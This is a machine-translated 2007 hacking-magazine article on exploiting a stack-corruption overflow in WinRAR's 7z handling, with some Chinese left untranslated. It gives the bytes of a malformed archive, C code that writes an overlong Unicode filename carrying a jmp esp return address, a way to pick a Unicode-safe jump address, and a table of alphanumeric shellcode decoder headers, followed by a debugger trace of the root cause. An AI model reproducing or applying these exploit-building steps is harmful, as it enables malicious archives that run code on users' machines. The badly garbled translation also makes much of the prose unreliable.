WinRAR 7z-compressed packet processing overflow analysis and use-vulnerability and early warning-the black bar safety net

ID MYHACK58:62200717380
Type myhack58
Reporter 佚名
Modified 2007-10-25T00:00:00


This article has been published in the hacker line of Defense of the 2 0 0 7 year 4 monthly. The author and the hacker line of Defense on the retention of copyright, reproduced, please indicate the original source.

For the reader: overflow of lovers Pre-knowledge: Assembly language, buffer overflow fundamentals

Text/figure of the solitary cigarette by cloud gyzy)【Jiangsu University information security & evil octal information security team】

security. nnov. ru in the 0 6 the end of time released a for WinRAR 7z overflow POC, can lead to execution of malicious code, may be some friends think that 7z format problem is not so serious, but WinRAR has a calculation Bug of the Bug: it does not recognize the extension, which means that the 7z format of the compressed packet extension into a rar can be extracted, which gives the malicious use of the created opportunities, Hey. WinRAR installation directory of the A Formats directory inside there are many extension is the fmt file, but are in fact the DLLS for the main program called to handle the different compression packages. In 7 months when the LZH format is also seen on Stack Overflow, but this time the 7z overflow strictly speaking can not call it a Stack overflow, after reading vulnerability analysis would know why.

Since we already have a poc that we did not need their own to read the 7z format description document, and 7z is open-source, on his official site be downloaded to the format Description and an open source project, interested friends can carefully study the 7z File format. Here I given directly to the author in the poc code published in an already constructed malformations of the compressed package:

unsigned char hz_part1[] = "\x37\x7A\xBC\xAF\x27\x1C\x00\x02" //first 8 bytes are fixed "\xEE\xD6\x49\x23" // 7z the head 3 The 2-byte CRC1 "\x00\x00\x00\x00\x00\x00\x00\x00" //next 7z the head of the offset here is 0 "\x2D\x40\x00\x00\x00\x00\x00\x00" //next the length of the head,here is 0x402D "\x3D\xC3\xFE\x9B" // in addition to the top 3 The 2-byte outer CRC2 "\x01\x05\x01\x0E\x01\x80\x0F\x01\x80\x11\x80\x01\x00"; //next head start

char filename[0x400A]; //long file name and Unicode encoding

unsigned char hz_part2[] = "\x14\x0A\x01\x00\xF0\xDE\xE9\xB5\xBF\xF2\xC6\x01\x15\x06\x01\x00" "\x20\x00\x00\x00\x00\x00"; //file attributes and other information

Thus, a malformation of the 7z compressed packet is constructed well, everyone to their own and the picture control bit, as shown in Figure 1


Figure 1 But first, Don't rush to open it, WinRAR for 7z compression package for CRC32 verification, if the checksum is wrong, then it will prompt the compressed package is damaged. So we must recalculate the CRC checksum value. Fortunately, czy large cattle blog published on a calculation 7zCRC check the program, and I in him based on the slight changes a little, in gratitude. If everyone in order to practice hand to do it yourself, then there is little need to note that, since the second CRC value will be indirect effects to the first CRC check, so you must first calculate the second CRC checksum, CRC32 algorithm online a grab a handful, I will not say more. 我 提供 的 7zCRC.exe 默认 校正 当前 目录 下 的 test.rar,this point also Please note that 7zCRC. exe in the Black anti-on the website of the supporting code can be found.

A small test chopper Maybe everyone will wonder why Figure 1 inside my file name is filled, why is a duplicate of 0x9960?, the answer is Unicode, 7z requirements the file name must be a Unicode encoding, 0x9960 is two nop(0x90 of Unicode, for Unicode, I also not much explanation, there is little need to keep in mind: 0x80 above will be escaped, for example: 0x4100 we all know is an uppercase A, but 0x9000 not everyone is familiar with the Nop, based on the language environment may be escaped into gibberish, and it is this that gives us the perfect use of brought a lot of trouble. We double-click to open the compressed package, and then points to extract the to trigger, WinRAR error, as shown in Figure 2:


Figure 2 Offset:9 0 9 0 9 0 9 0 Hey, EIP is overwritten, the next thing to do is to locate overflow points, two positioning method, I still do not say more, their turn before the Black Defense. I directly give the result, the overflow point in the filename+8 start of the four bytes, due to our Shellcode on the stack, and habitual thought of the Chinese 2 0 0 0/XP/2k3 under the generic Jmp esp to jump address 0x7FFA4512,here see my code:

//Write long file name char content[0x2005]; //0x400A/2 = 0x2005 for ASCII to Unicode conversion memset(content,0x41,0x2005); //fill 0x41 does not cause escape problems memcpy(content+4, "\x12\x45\xfa\x7f",4); // MultiByteToWideChar(CP_ACP,0,content,0x2005,(LPWSTR)filename,0x400A); //Convert WriteFile(h7z, (LPCVOID)filename,0x400A,&dwWritten,NULL);

This time the stack address is in 0x17Dxxxxx place, immediately re-generate a compressed package, to open, but the error address is not in the stack, means that the EIP did not jump to the stack, as shown in Figure 3:


Figure 3 Strange,3f?? After I check the information, Unicode is a double byte code 3f shows an unknown character, the file name of 1 to 6 bytes after the MultiByteToWideChar function into the future has turned out this way\x41\x00\x41\x00\x41\x00\x41\x00\ x12\x00\x45\x00\x3f\x00\x41,it seems that this address is not up, the poc code author is 0x100201BB this address, this address is in the 7zxa. dll the. the rdata section, though there is a 0xBB, but since it is in the head and tail ends, we can still give it fill a byte, so that you are not afraid to escape, but in testing I found 7z. fmt and 7z. dll load base address almost every time is not the same, so this address also can only give up, do we really want to give up?

Trick Our jump address must meet three conditions:1. Need to be able to jump back into the stack 2. Four bytes can not appear>0x80-byte 3. Or there is 0x80 or more bytes cannot appear in the middle of the two positions. I turned the OD of the RAM, one module is search over the yellow day pays off, in all the loaded modules at the highest point, the Shell32. dll the. text segments which actually made me find: 0x7D646981, Hey, the jump address can be so constructed 0x41000x4100x4100x8A7C 0x69000x64000x7D00,which is 0x8A7C is 0x81 Unicode, but this is not the perfect solution, instead of each subsystem of the 0x7D646981 is Jmp esp, but the same SP under the Shell32. dll load base address should be fixed, as to how to achieve universal, this problem is left to the reader. Shellcode locate the problem considered temporarily come to an end, immediately to the problem is to be able to withstand conversion of the Shellcode, right, pure alphanumeric Shellcode is in line with the requirements of the Shellcode, stand MultiByteToWideChar toss the Also it the child. Fortunately, the Black anti-on period has just been published about the preparation of a pure alphanumeric Shellcode articles, or I have to play more than an hour the word:)don't know whether everyone already have their own AlphaNumric Shellcode, if not, I'm looking for to a generate a template for everyone to use:

{ "nops", "IIIIIIIIIIIIIIIIII7" mixedcase_ascii_decoder_body }, { "eax", "PYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body }, { "ecx", "IIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body }, { "edx", "JJJJJJJJJJJJJJJJJ7RY" mixedcase_ascii_decoder_body }, { "ebx", "SYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body }, { "esp", "TYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body }, { "ebp", "UYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body }, { "esi", "VYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body }, { "edi", "WYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body }, { "[esp-1 0]", "LLLLLLLLLLLLLLLLYIIIIIIIIIQZ" mixedcase_ascii_decoder_body }, { "[esp-C]", "LLLLLLLLLLLLYIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body }, { "[esp-8]", "LLLLLLLLYIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body }, { "[esp-4]", "LLLL7YIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body }, { "[esp]", "YIIIIIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body }, { "[esp+4]", "YYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body }, { "[esp+8]", "YYYIIIIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body }, { "[esp+C]", "YYYYIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body }, { "[esp+1 0]", "YYYYYIIIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body }, { "[esp+1 4]", "YYYYYYIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body }, { "[esp+1 8]", "YYYYYYYIIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body }, { "[esp+1C]", "YYYYYYYYIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body }, { "seh", mixedcase_w32sehgetpc "IIIIIIIIIIIIIIIII7QZ" // ecx code

This is the decoded header, based on the overflow of the time which register points to the Shellcode to be used, to generate the Shellcode main function of the supporting code alphashellcode inside there. We should choose TYIIIIIIIIIIIIIIII7QZ the decoded header, Shellcode blame long, I'm not attached, so as not to have to lie to royalties too. Tested again, successfully, as shown in Figure 4:


Figure 4

Supremacy heavy Although the use of is successful, but I do not know you have not found some rather strange problems:1. If it is stack overflow, why the overflow point, but in the ultra-long front of the string, rather than in the middle or the back, does it buffer only 1 byte? 2. Why is open does not trigger the vulnerability only decompressed when it is triggered? 3. Why gyzy said This is not strictly a stack overflow? (Sweat..) with this series of questions, any words guess are pale, or so OD to unravel our mystery。 Here by the way hair look whine, OD for multi-thread processing is really not how, often would somehow appear Feign Death phenomenon, the first load WinRAR. exe let OD run up, remember to put a jump address to change, so as to avoid break down of the embarrassing situation, also remember correcting the CRC value, otherwise, it will politely warn you about it, ha ha, pray your machine is not suspended animation right, Amen, as shown in Figure 5:


Figure 5 I found the original version of the OD if stability is a little better, so I use the original version, this time of EIP has been overwritten, and I in the stack window up and down are flipped, not turned to the normal return address, strange, not all of the return address are covered? Too hard, actually a little clues are not to leave, according to the conventional stack traceback under very easy to find problems in the code, it seems that things more and more confusing. Ctrl+F2 again, the F9 let him run up, and then bp CreateThread,in which the above lower-off, because it was obvious to unzip the file when you need a new line of threads, you will find 0049CDFC this address is new line process the starting address, and then a portion of the unit down with(omitted more than N steps, if we are to write out a little feel like writing a novel, up to this place:

0045BD63 |. E8 7466FBFF |CALL WinRAR. 004123DC 0045BD68 |. 84C0 |TEST AL,AL 0045BD6A |. 7 4 0 4 |JE SHORT WinRAR. 0045BD70 0045BD6C |. B0 0 1 |MOV AL,1 0045BD6E |. EB 0F |JMP SHORT WinRAR. 0045BD7F 0045BD70 |> 4 3 |INC EBX 0045BD71 |> 3B9F 0 4 0 4 0 0 0 0 CMP EBX,DWORD PTR DS:[EDI+4 0 4] 0045BD77 |.^ 0F8C 41FFFFFF \JL WinRAR. 0045BCBE 0045BD7D |. 33C0 XOR EAX,EAX 0045BD7F |> 5F POP EDI 0045BD80 |. 5E POP ESI 0045BD81 |. 5B POP EBX 0045BD82 |. 8BE5 MOV ESP,EBP 0045BD84 |. 5D POP EBP 0045BD85 \. C2 0 8 0 0 RETN 8

Return to a time when EIP is overwritten, the RETN 8 instruction descriptions in the return address back to have 8 bytes of reserved space, and then with the Shellcode, we 0045BD80 the lower off, as shown in Figure 6:


Figure 6

霍然 cheerful But in this case the ESP but still 01DCF80C, how later on the jump to 017D6578?, the answer lies in the following 0045B082 MOV ESP,EBP and EBP is precisely 017D6578, which explains just all sorts of questions about why an exception occurs when the stack backtrace is less than the call information, why the overflow point will appear in the string the first few bytes. The answer is the EBP value to be contaminated. Repeat the above several steps, in 01DCF8E8 the upper and lower write hard off, the inside holds is covering the front of the EBP, the following this code covers the stack in the correct EBP value:

00494AD8 |. 5 7 PUSH EDI 00494AD9 |. 8B7D 0 8 MOV EDI,DWORD PTR SS:[EBP+8] 00494ADC |. 8BC7 MOV EAX,EDI 00494ADE |. 8B75 0C MOV ESI,DWORD PTR SS:[EBP+C] 00494AE1 |. 8B4D 1 0 MOV ECX,DWORD PTR SS:[EBP+1 0] 00494AE4 |. 8BD1 MOV EDX,ECX 00494AE6 |. D1E9 SHR ECX,1 00494AE8 |. D1E9 SHR ECX,1 00494AEA |. FC CLD ecx 2 0 3 00494AEB |. F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI] 00494AED |. 8BCA MOV ECX,EDX 00494AEF |. 83E1 0 3 AND ECX,3 2 00494AF2 |. F3:A4 REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI] 00494AF4 |. 5F POP EDI

Omitting more than N steps, and finally found to be 0 0 4 1 2 5 6 2 Here the instruction will EBP value of the pollution, then returns to 0045BD82 when indirect coverage of the ESP.

0 0 4 1 2 5 6 2 |. 5D POP EBP

Tracking to this time also feel a little mean, it is difficult to say that this is a standard overwrite the return address or SEH chain stack overflow, but here does indirectly cover the return address. In recent years, a variety of third-party software of file processing vulnerability gradually more up, personally feel like this type of vulnerability is the basic can only rely on black box testing, code auditing may be difficult to find. This times the author can be found also calculate luck, maybe a little shorter file name is simply triggered not so hidden Bugs. And do not good use, the overflow point by after point also can camouflage a tempting point to the file name too, alas.... But for everyone to practice your hand is good, and involves many aspects of things.